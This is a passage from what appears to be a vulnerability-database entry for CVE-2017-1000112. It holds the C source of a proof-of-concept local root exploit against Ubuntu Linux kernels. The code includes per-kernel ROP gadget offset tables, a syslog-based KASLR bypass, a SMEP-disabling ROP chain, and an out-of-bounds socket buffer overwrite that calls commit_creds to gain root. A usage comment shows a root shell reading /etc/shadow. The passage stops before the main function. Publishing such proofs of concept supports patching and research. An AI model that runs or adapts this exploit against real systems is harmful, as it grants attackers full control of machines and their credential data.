corruption due to UFO to non-UFO path switch(CVE-2017-1000112)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000112"], "modified": "2017-08-14T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96343", "id": "SSV:96343", "sourceData": "\n // A proof-of-concept local root exploit for CVE-2017-1000112.\r\n// Includes KASLR and SMEP bypasses. No SMAP bypass.\r\n// Tested on Ubuntu trusty 4.4.0-* and Ubuntu xenial 4-8-0-* kernels.\r\n//\r\n// Usage:\r\n// user@ubuntu:~$ uname -a\r\n// Linux ubuntu 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux\r\n// user@ubuntu:~$ whoami\r\n// user\r\n// user@ubuntu:~$ id\r\n// uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)\r\n// user@ubuntu:~$ gcc pwn.c -o pwn\r\n// user@ubuntu:~$ ./pwn \r\n// [.] starting\r\n// [.] checking distro and kernel versions\r\n// [.] kernel version '4.8.0-58-generic' detected\r\n// [~] done, versions looks good\r\n// [.] checking SMEP and SMAP\r\n// [~] done, looks good\r\n// [.] setting up namespace sandbox\r\n// [~] done, namespace sandbox set up\r\n// [.] KASLR bypass enabled, getting kernel addr\r\n// [~] done, kernel text: ffffffffae400000\r\n// [.] commit_creds: ffffffffae4a5d20\r\n// [.] prepare_kernel_cred: ffffffffae4a6110\r\n// [.] SMEP bypass enabled, mmapping fake stack\r\n// [~] done, fake stack mmapped\r\n// [.] executing payload ffffffffae40008d\r\n// [~] done, should be root now\r\n// [.] checking if we got root\r\n// [+] got r00t ^_^\r\n// root@ubuntu:/home/user# whoami\r\n// root\r\n// root@ubuntu:/home/user# id\r\n// uid=0(root) gid=0(root) groups=0(root)\r\n// root@ubuntu:/home/user# cat /etc/shadow\r\n// root:!:17246:0:99999:7:::\r\n// daemon:*:17212:0:99999:7:::\r\n// bin:*:17212:0:99999:7:::\r\n// sys:*:17212:0:99999:7:::\r\n// ...\r\n//\r\n// Andrey Konovalov <andreyknvl@gmail.com>\r\n\r\n#define _GNU_SOURCE\r\n\r\n#include <assert.h>\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n#include <sched.h>\r\n#include <stdarg.h>\r\n#include <stdbool.h>\r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n\r\n#include <linux/socket.h>\r\n#include <netinet/ip.h>\r\n#include <sys/klog.h>\r\n#include <sys/mman.h>\r\n#include <sys/utsname.h>\r\n\r\n#define ENABLE_KASLR_BYPASS\t\t1\r\n#define ENABLE_SMEP_BYPASS\t\t1\r\n\r\n// Will be overwritten if ENABLE_KASLR_BYPASS is enabled.\r\nunsigned long KERNEL_BASE =\t\t0xffffffff81000000ul;\r\n\r\n// Will be overwritten by detect_versions().\r\nint kernel = -1;\r\n\r\nstruct kernel_info {\r\n\tconst char* distro;\r\n\tconst char* version;\r\n\tuint64_t commit_creds;\r\n\tuint64_t prepare_kernel_cred;\r\n\tuint64_t xchg_eax_esp_ret;\r\n\tuint64_t pop_rdi_ret;\r\n\tuint64_t mov_dword_ptr_rdi_eax_ret;\r\n\tuint64_t mov_rax_cr4_ret;\r\n\tuint64_t neg_rax_ret;\r\n\tuint64_t pop_rcx_ret;\r\n\tuint64_t or_rax_rcx_ret;\r\n\tuint64_t xchg_eax_edi_ret;\r\n\tuint64_t mov_cr4_rdi_ret;\r\n\tuint64_t jmp_rcx;\r\n};\r\n\r\nstruct kernel_info kernels[] = {\r\n\t{ \"trusty\", \"4.4.0-21-generic\", 0x9d7a0, 0x9da80, 0x4520a, 0x30f75, 0x109957, 0x1a7a0, 0x3d6b7a, 0x1cbfc, 0x76453, 0x49d4d, 0x61300, 0x1b91d },\r\n\t{ \"trusty\", \"4.4.0-22-generic\", 0x9d7e0, 0x9dac0, 0x4521a, 0x28c19d, 0x1099b7, 0x1a7f0, 0x3d781a, 0x1cc4c, 0x764b3, 0x49d5d, 0x61300, 0x48040 },\r\n\t{ \"trusty\", \"4.4.0-24-generic\", 0x9d5f0, 0x9d8d0, 0x4516a, 0x1026cd, 0x107757, 0x1a810, 0x3d7a9a, 0x1cc6c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },\r\n\t{ \"trusty\", \"4.4.0-28-generic\", 0x9d760, 0x9da40, 0x4516a, 0x3dc58f, 0x1079a7, 0x1a830, 0x3d801a, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },\r\n\t{ \"trusty\", \"4.4.0-31-generic\", 0x9d760, 0x9da40, 0x4516a, 0x3e223f, 0x1079a7, 0x1a830, 0x3ddcca, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },\r\n\t{ \"trusty\", \"4.4.0-34-generic\", 0x9d760, 0x9da40, 0x4510a, 0x355689, 0x1079a7, 0x1a830, 0x3ddd1a, 0x1cc8c, 0x763b3, 0x49c5d, 0x612f0, 0x47f40 },\r\n\t{ \"trusty\", \"4.4.0-36-generic\", 0x9d770, 0x9da50, 0x4510a, 0x1eec9d, 0x107a47, 0x1a830, 0x3de02a, 0x1cc8c, 0x763c3, 0x29595, 0x61300, 0x47f40 },\r\n\t{ \"trusty\", \"4.4.0-38-generic\", 0x9d820, 0x9db00, 0x4510a, 0x598fd, 0x107af7, 0x1a820, 0x3de8ca, 0x1cc7c, 0x76473, 0x49c5d, 0x61300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-42-generic\", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3deb7a, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-45-generic\", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3debda, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-47-generic\", 0x9d940, 0x9dc20, 0x4511a, 0x171f8d, 0x107bd7, 0x1a820, 0x3e241a, 0x1cc7c, 0x76463, 0x299f5, 0x61300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-51-generic\", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-53-generic\", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-57-generic\", 0x9ebb0, 0x9ee90, 0x4518a, 0x39401d, 0x1097d7, 0x1a820, 0x3e527a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-59-generic\", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dbc4e, 0x1097d7, 0x1a820, 0x3e571a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-62-generic\", 0x9ebe0, 0x9eec0, 0x4518a, 0x3ea46f, 0x109837, 0x1a820, 0x3e5e5a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-63-generic\", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-64-generic\", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-66-generic\", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-67-generic\", 0x9eb60, 0x9ee40, 0x4518a, 0x12a9dc, 0x109887, 0x1a820, 0x3e67ba, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-70-generic\", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-71-generic\", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-72-generic\", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-75-generic\", 0x9eb60, 0x9ee40, 0x4518a, 0x303cfd, 0x1098a7, 0x1a820, 0x3e67ea, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-78-generic\", 0x9eb70, 0x9ee50, 0x4518a, 0x30366d, 0x1098b7, 0x1a820, 0x3e710a, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },\r\n\t{ \"trusty\", \"4.4.0-79-generic\", 0x9ebb0, 0x9ee90, 0x4518a, 0x3ebdcf, 0x1099a7, 0x1a830, 0x3e77ba, 0x1cc8c, 0x774e3, 0x49cdd, 0x62330, 0x1a78b },\r\n\t{ \"trusty\", \"4.4.0-81-generic\", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dc688, 0x1099a7, 0x1a830, 0x3e789a, 0x1cc8c, 0x774e3, 0x24487, 0x62330, 0x1a78b },\r\n\t{ \"trusty\", \"4.4.0-83-generic\", 0x9ebc0, 0x9eea0, 0x451ca, 0x2dc6f5, 0x1099b7, 0x1a830, 0x3e78fa, 0x1cc8c, 0x77533, 0x49d1d, 0x62360, 0x1a78b },\r\n\t{ \"xenial\", \"4.8.0-34-generic\", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 },\r\n\t{ \"xenial\", \"4.8.0-36-generic\", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 },\r\n\t{ \"xenial\", \"4.8.0-39-generic\", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-41-generic\", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-45-generic\", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0xdfc5, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-46-generic\", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-49-generic\", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x439bba, 0x102e33, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-52-generic\", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x63e843, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-54-generic\", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x5ada3c, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-56-generic\", 0xa5d00, 0xa60f0, 0x17c55, 0x39d50d, 0x119207, 0x1b170, 0x43a14a, 0x44d4a0, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-58-generic\", 0xa5d20, 0xa6110, 0x17c55, 0xe56f5, 0x119227, 0x1b170, 0x439e7a, 0x162622, 0x7bd23, 0x12c7f7, 0x64210, 0x49fa0 },\r\n};\r\n\r\n// Used to get root privileges.\r\n#define COMMIT_CREDS\t\t\t(KERNEL_BASE + kernels[kernel].commit_creds)\r\n#define PREPARE_KERNEL_CRED\t\t(KERNEL_BASE + kernels[kernel].prepare_kernel_cred)\r\n\r\n// Used when ENABLE_SMEP_BYPASS is used.\r\n// - xchg eax, esp ; ret\r\n// - pop rdi ; ret\r\n// - mov dword ptr [rdi], eax ; ret\r\n// - push rbp ; mov rbp, rsp ; mov rax, cr4 ; pop rbp ; ret\r\n// - neg rax ; ret\r\n// - pop rcx ; ret \r\n// - or rax, rcx ; ret\r\n// - xchg eax, edi ; ret\r\n// - push rbp ; mov rbp, rsp ; mov cr4, rdi ; pop rbp ; ret\r\n// - jmp rcx\r\n#define XCHG_EAX_ESP_RET\t\t(KERNEL_BASE + kernels[kernel].xchg_eax_esp_ret)\r\n#define POP_RDI_RET\t\t\t(KERNEL_BASE + kernels[kernel].pop_rdi_ret)\r\n#define MOV_DWORD_PTR_RDI_EAX_RET\t(KERNEL_BASE + kernels[kernel].mov_dword_ptr_rdi_eax_ret)\r\n#define MOV_RAX_CR4_RET\t\t\t(KERNEL_BASE + kernels[kernel].mov_rax_cr4_ret)\r\n#define NEG_RAX_RET\t\t\t(KERNEL_BASE + kernels[kernel].neg_rax_ret)\r\n#define POP_RCX_RET\t\t\t(KERNEL_BASE + kernels[kernel].pop_rcx_ret)\r\n#define OR_RAX_RCX_RET\t\t\t(KERNEL_BASE + kernels[kernel].or_rax_rcx_ret)\r\n#define XCHG_EAX_EDI_RET\t\t(KERNEL_BASE + kernels[kernel].xchg_eax_edi_ret)\r\n#define MOV_CR4_RDI_RET\t\t\t(KERNEL_BASE + kernels[kernel].mov_cr4_rdi_ret)\r\n#define JMP_RCX\t\t\t\t(KERNEL_BASE + kernels[kernel].jmp_rcx)\r\n\r\n// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * *\r\n\r\ntypedef unsigned long __attribute__((regparm(3))) (*_commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (*_prepare_kernel_cred)(unsigned long cred);\r\n\r\nvoid get_root(void) {\r\n\t((_commit_creds)(COMMIT_CREDS))(\r\n\t ((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0));\r\n}\r\n\r\n// * * * * * * * * * * * * * * * * SMEP bypass * * * * * * * * * * * * * * * *\r\n\r\nuint64_t saved_esp;\r\n\r\n// Unfortunately GCC does not support `__atribute__((naked))` on x86, which\r\n// can be used to omit a function's prologue, so I had to use this weird\r\n// wrapper hack as a workaround. Note: Clang does support it, which means it\r\n// has better support of GCC attributes than GCC itself. Funny.\r\nvoid wrapper() {\r\n\tasm volatile (\"\t\t\t\t\t\\n\\\r\n\tpayload:\t\t\t\t\t\\n\\\r\n\t\tmovq %%rbp, %%rax\t\t\t\\n\\\r\n\t\tmovq $0xffffffff00000000, %%rdx\t\t\\n\\\r\n\t\tandq %%rdx, %%rax\t\t\t\\n\\\r\n\t\tmovq %0, %%rdx\t\t\t\t\\n\\\r\n\t\taddq %%rdx, %%rax\t\t\t\\n\\\r\n\t\tmovq %%rax, %%rsp\t\t\t\\n\\\r\n\t\tcall get_root\t\t\t\t\\n\\\r\n\t\tret\t\t\t\t\t\\n\\\r\n\t\" : : \"m\"(saved_esp) : );\r\n}\r\n\r\nvoid payload();\r\n\r\n#define CHAIN_SAVE_ESP\t\t\t\t\\\r\n\t*stack++ = POP_RDI_RET;\t\t\t\\\r\n\t*stack++ = (uint64_t)&saved_esp;\t\\\r\n\t*stack++ = MOV_DWORD_PTR_RDI_EAX_RET;\r\n\r\n#define SMEP_MASK 0x100000\r\n\r\n#define CHAIN_DISABLE_SMEP\t\t\t\\\r\n\t*stack++ = MOV_RAX_CR4_RET;\t\t\\\r\n\t*stack++ = NEG_RAX_RET;\t\t\t\\\r\n\t*stack++ = POP_RCX_RET;\t\t\t\\\r\n\t*stack++ = SMEP_MASK;\t\t\t\\\r\n\t*stack++ = OR_RAX_RCX_RET;\t\t\\\r\n\t*stack++ = NEG_RAX_RET;\t\t\t\\\r\n\t*stack++ = XCHG_EAX_EDI_RET;\t\t\\\r\n\t*stack++ = MOV_CR4_RDI_RET;\r\n\r\n#define CHAIN_JMP_PAYLOAD \\\r\n\t*stack++ = POP_RCX_RET; \\\r\n\t*stack++ = (uint64_t)&payload; \\\r\n\t*stack++ = JMP_RCX;\r\n\r\nvoid mmap_stack() {\r\n\tuint64_t stack_aligned, stack_addr;\r\n\tint page_size, stack_size, stack_offset;\r\n\tuint64_t* stack;\r\n\r\n\tpage_size = getpagesize();\r\n\r\n\tstack_aligned = (XCHG_EAX_ESP_RET & 0x00000000fffffffful) & ~(page_size - 1);\r\n\tstack_addr = stack_aligned - page_size * 4;\r\n\tstack_size = page_size * 8;\r\n\tstack_offset = XCHG_EAX_ESP_RET % page_size;\r\n\r\n\tstack = mmap((void*)stack_addr, stack_size, PROT_READ | PROT_WRITE,\r\n\t\t\tMAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);\r\n\tif (stack == MAP_FAILED || stack != (void*)stack_addr) {\r\n\t\tperror(\"[-] mmap()\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tstack = (uint64_t*)((char*)stack_aligned + stack_offset);\r\n\r\n\tCHAIN_SAVE_ESP;\r\n\tCHAIN_DISABLE_SMEP;\r\n\tCHAIN_JMP_PAYLOAD;\r\n}\r\n\r\n// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *\r\n\r\n#define SYSLOG_ACTION_READ_ALL 3\r\n#define SYSLOG_ACTION_SIZE_BUFFER 10\r\n\r\nvoid mmap_syslog(char** buffer, int* size) {\r\n\t*size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);\r\n\tif (*size == -1) {\r\n\t\tperror(\"[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\t*size = (*size / getpagesize() + 1) * getpagesize();\r\n\t*buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE,\r\n\t\t\t\t MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\r\n\r\n\t*size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);\r\n\tif (*size == -1) {\r\n\t\tperror(\"[-] klogctl(SYSLOG_ACTION_READ_ALL)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n}\r\n\r\nunsigned long get_kernel_addr_trusty(char* buffer, int size) {\r\n\tconst char* needle1 = \"Freeing unused\";\r\n\tchar* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));\r\n\tif (substr == NULL) {\r\n\t\tfprintf(stderr, \"[-] substring '%s' not found in syslog\\n\", needle1);\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tint start = 0;\r\n\tint end = 0;\r\n\tfor (end = start; substr[end] != '-'; end++);\r\n\r\n\tconst char* needle2 = \"ffffff\";\r\n\tsubstr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));\r\n\tif (substr == NULL) {\r\n\t\tfprintf(stderr, \"[-] substring '%s' not found in syslog\\n\", needle2);\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tchar* endptr = &substr[16];\r\n\tunsigned long r = strtoul(&substr[0], &endptr, 16);\r\n\r\n\tr &= 0xffffffffff000000ul;\r\n\r\n\treturn r;\r\n}\r\n\r\nunsigned long get_kernel_addr_xenial(char* buffer, int size) {\r\n\tconst char* needle1 = \"Freeing unused\";\r\n\tchar* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));\r\n\tif (substr == NULL) {\r\n\t\tfprintf(stderr, \"[-] substring '%s' not found in syslog\\n\", needle1);\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tint start = 0;\r\n\tint end = 0;\r\n\tfor (start = 0; substr[start] != '-'; start++);\r\n\tfor (end = start; substr[end] != '\\n'; end++);\r\n\r\n\tconst char* needle2 = \"ffffff\";\r\n\tsubstr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));\r\n\tif (substr == NULL) {\r\n\t\tfprintf(stderr, \"[-] substring '%s' not found in syslog\\n\", needle2);\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tchar* endptr = &substr[16];\r\n\tunsigned long r = strtoul(&substr[0], &endptr, 16);\r\n\r\n\tr &= 0xfffffffffff00000ul;\r\n\tr -= 0x1000000ul;\r\n\r\n\treturn r;\r\n}\r\n\r\nunsigned long get_kernel_addr() {\r\n\tchar* syslog;\r\n\tint size;\r\n\tmmap_syslog(&syslog, &size);\r\n\r\n\tif (strcmp(\"trusty\", kernels[kernel].distro) == 0 &&\r\n\t strncmp(\"4.4.0\", kernels[kernel].version, 5) == 0)\r\n\t\treturn get_kernel_addr_trusty(syslog, size);\r\n\tif (strcmp(\"xenial\", kernels[kernel].distro) == 0 &&\r\n\t strncmp(\"4.8.0\", kernels[kernel].version, 5) == 0)\r\n\t\treturn get_kernel_addr_xenial(syslog, size);\r\n\r\n\tprintf(\"[-] KASLR bypass only tested on trusty 4.4.0-* and xenial 4-8-0-*\");\r\n\texit(EXIT_FAILURE);\r\n}\r\n\r\n// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *\r\n\r\nstruct ubuf_info {\r\n\tuint64_t callback;\t// void (*callback)(struct ubuf_info *, bool)\r\n\tuint64_t ctx;\t\t// void *\r\n\tuint64_t desc;\t\t// unsigned long\r\n};\r\n\r\nstruct skb_shared_info {\r\n\tuint8_t nr_frags;\t// unsigned char\r\n\tuint8_t tx_flags;\t// __u8\r\n\tuint16_t gso_size;\t// unsigned short\r\n\tuint16_t gso_segs;\t// unsigned short\r\n\tuint16_t gso_type;\t// unsigned short\r\n\tuint64_t frag_list;\t// struct sk_buff *\r\n\tuint64_t hwtstamps;\t// struct skb_shared_hwtstamps\r\n\tuint32_t tskey;\t\t// u32\r\n\tuint32_t ip6_frag_id;\t// __be32\r\n\tuint32_t dataref;\t// atomic_t\r\n\tuint64_t destructor_arg; // void *\r\n\tuint8_t frags[16][17];\t// skb_frag_t frags[MAX_SKB_FRAGS];\r\n};\r\n\r\nstruct ubuf_info ui;\r\n\r\nvoid init_skb_buffer(char* buffer, unsigned long func) {\r\n\tstruct skb_shared_info* ssi = (struct skb_shared_info*)buffer;\r\n\tmemset(ssi, 0, sizeof(*ssi));\r\n\r\n\tssi->tx_flags = 0xff;\r\n\tssi->destructor_arg = (uint64_t)&ui;\r\n\tssi->nr_frags = 0;\r\n\tssi->frag_list = 0;\r\n\r\n\tui.callback = func;\r\n}\r\n\r\n// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *\r\n\r\n#define SHINFO_OFFSET 3164\r\n\r\nvoid oob_execute(unsigned long payload) {\r\n\tchar buffer[4096];\r\n\tmemset(&buffer[0], 0x42, 4096);\r\n\tinit_skb_buffer(&buffer[SHINFO_OFFSET], payload);\r\n\r\n\tint s = socket(PF_INET, SOCK_DGRAM, 0);\r\n\tif (s == -1) {\r\n\t\tperror(\"[-] socket()\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tstruct sockaddr_in addr;\r\n\tmemset(&addr, 0, sizeof(addr));\r\n\taddr.sin_family = AF_INET;\r\n\taddr.sin_port = htons(8000);\r\n\taddr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\r\n\r\n\tif (connect(s, (void*)&addr, sizeof(addr))) {\r\n\t\tperror(\"[-] connect()\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tint size = SHINFO_OFFSET + sizeof(struct skb_shared_info);\r\n\tint rv = send(s, buffer, size, MSG_MORE);\r\n\tif (rv != size) {\r\n\t\tperror(\"[-] send()\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tint val = 1;\r\n\trv = setsockopt(s, SOL_SOCKET, SO_NO_CHECK, &val, sizeof(val));\r\n\tif (rv != 0) {\r\n\t\tperror(\"[-] setsockopt(SO_NO_CHECK)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tsend(s, buffer, 1, 0);\r\n\r\n\tclose(s);\r\n}\r\n\r\n// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *\r\n\r\n#define CHUNK_SIZE 1024\r\n\r\nint read_file(const char* file, char* buffer, int max_length) {\r\n\tint f = open(file, O_RDONLY);\r\n\tif (f == -1)\r\n\t\treturn -1;\r\n\tint bytes_read = 0;\r\n\twhile (true) {\r\n\t\tint bytes_to_read = CHUNK_SIZE;\r\n\t\tif (bytes_to_read > max_length - bytes_read)\r\n\t\t\tbytes_to_read = max_length - bytes_read;\r\n\t\tint rv = read(f, &buffer[bytes_read], bytes_to_read);\r\n\t\tif (rv == -1)\r\n\t\t\treturn -1;\r\n\t\tbytes_read += rv;\r\n\t\tif (rv == 0)\r\n\t\t\treturn bytes_read;\r\n\t}\r\n}\r\n\r\n#define LSB_RELEASE_LENGTH 1024\r\n\r\nvoid get_distro_codename(char* output, int max_length) {\r\n\tchar buffer[LSB_RELEASE_LENGTH];\r\n\tint length = read_file(\"/etc/lsb-release\", &buffer[0], LSB_RELEASE_LENGTH);\r\n\tif (length == -1) {\r\n\t\tperror(\"[-] open/read(/etc/lsb-release)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tconst char *needle = \"DISTRIB_CODENAME=\";\r\n\tint needle_length = strlen(needle);\r\n\tchar* found = memmem(&buffer[0], length, needle, needle_length);\r\n\tif (found == NULL) {\r\n\t\tprintf(\"[-] couldn't find DISTRIB_CODENAME in /etc/lsb-release\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tint i;\r\n\tfor (i = 0; found[needle_length + i] != '\\n'; i++) {\r\n\t\tassert(i < max_length);\r\n\t\tassert((found - &buffer[0]) + needle_length + i < length);\r\n\t\toutput[i] = found[needle_length + i];\r\n\t}\r\n}\r\n\r\nvoid get_kernel_version(char* output, int max_length) {\r\n\tstruct utsname u;\r\n\tint rv = uname(&u);\r\n\tif (rv != 0) {\r\n\t\tperror(\"[-] uname())\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tassert(strlen(u.release) <= max_length);\r\n\tstrcpy(&output[0], u.release);\r\n}\r\n\r\n#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))\r\n\r\n#define DISTRO_CODENAME_LENGTH 32\r\n#define KERNEL_VERSION_LENGTH 32\r\n\r\nvoid detect_versions() {\r\n\tchar codename[DISTRO_CODENAME_LENGTH];\r\n\tchar version[KERNEL_VERSION_LENGTH];\r\n\r\n\tget_distro_codename(&codename[0], DISTRO_CODENAME_LENGTH);\r\n\tget_kernel_version(&version[0], KERNEL_VERSION_LENGTH);\r\n\r\n\tint i;\r\n\tfor (i = 0; i < ARRAY_SIZE(kernels); i++) {\r\n\t\tif (strcmp(&codename[0], kernels[i].distro) == 0 &&\r\n\t\t strcmp(&version[0], kernels[i].version) == 0) {\r\n\t\t\tprintf(\"[.] kernel version '%s' detected\\n\", kernels[i].version);\r\n\t\t\tkernel = i;\r\n\t\t\treturn;\r\n\t\t}\r\n\t}\r\n\r\n\tprintf(\"[-] kernel version not recognized\\n\");\r\n\texit(EXIT_FAILURE);\r\n}\r\n\r\n#define PROC_CPUINFO_LENGTH 4096\r\n\r\n// 0 - nothing, 1 - SMEP, 2 - SMAP, 3 - SMEP & SMAP\r\nint smap_smep_enabled() {\r\n\tchar buffer[PROC_CPUINFO_LENGTH];\r\n\tint length = read_file(\"/proc/cpuinfo\", &buffer[0], PROC_CPUINFO_LENGTH);\r\n\tif (length == -1) {\r\n\t\tperror(\"[-] open/read(/proc/cpuinfo)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tint rv = 0;\r\n\tchar* found = memmem(&buffer[0], length, \"smep\", 4);\r\n\tif (found != NULL)\r\n\t\trv += 1;\r\n\tfound = memmem(&buffer[0], length, \"smap\", 4);\r\n\tif (found != NULL)\r\n\t\trv += 2;\r\n\treturn rv;\r\n}\r\n\r\nvoid check_smep_smap() {\r\n\tint rv = smap_smep_enabled();\r\n\tif (rv >= 2) {\r\n\t\tprintf(\"[-] SMAP detected, no bypass available\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n#if !ENABLE_SMEP_BYPASS\r\n\tif (rv >= 1) {\r\n\t\tprintf(\"[-] SMEP detected, use ENABLE_SMEP_BYPASS\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n#endif\r\n}\r\n\r\n// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * 